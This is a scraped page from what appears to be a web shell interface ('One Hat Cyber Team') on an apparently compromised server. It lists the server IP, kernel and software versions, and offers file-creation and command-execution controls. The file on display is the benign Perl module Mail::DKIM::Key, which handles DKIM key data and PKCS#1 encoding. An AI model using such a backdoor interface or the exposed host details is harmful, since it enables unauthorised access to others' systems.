⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.23
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
perl5
/
vendor_perl
/
Mail
/
DKIM
/
View File Name :
Key.pm
#!/usr/bin/perl # # Copyright 2006 Jason Long. All rights reserved. # # Copyright (c) 2004 Anthony D. Urso. All rights reserved. # This program is free software; you can redistribute it and/or # modify it under the same terms as Perl itself. package Mail::DKIM::Key; use strict; sub cork { my $self = shift; (@_) and $self->{'CORK'} = shift; $self->{'CORK'} or $self->convert; $self->{'CORK'}; } sub data { my $self = shift; (@_) and $self->{'DATA'} = shift; $self->{'DATA'}; } sub errorstr { my $self = shift; (@_) and $self->{'ESTR'} = shift; $self->{'ESTR'}; } sub size { my $self = shift; return $self->cork->size * 8; } sub type { my $self = shift; (@_) and $self->{'TYPE'} = shift; $self->{'TYPE'}; } sub calculate_EM { my ($digest_algorithm, $digest, $emLen) = @_; # this function performs DER encoding of the algorithm ID for the # hash function and the hash value itself # It has this syntax: # DigestInfo ::= SEQUENCE { # digestAlgorithm AlgorithmIdentifier, # digest OCTET STRING # } # RFC 3447, page 42, provides the following octet values: my %digest_encoding = ( "SHA-1" => pack("H*", "3021300906052B0E03021A05000414"), "SHA-256" => pack("H*", "3031300d060960864801650304020105000420"), ); defined $digest_encoding{$digest_algorithm} or die "Unsupported digest algorithm '$digest_algorithm'"; my $T = $digest_encoding{$digest_algorithm} . $digest; my $tLen = length($T); if ($emLen < $tLen + 11) { die "Intended encoded message length too short."; } my $PS = chr(0xff) x ($emLen - $tLen - 3); my $EM = chr(0) . chr(1) . $PS . chr(0) . $T; return $EM; } 1;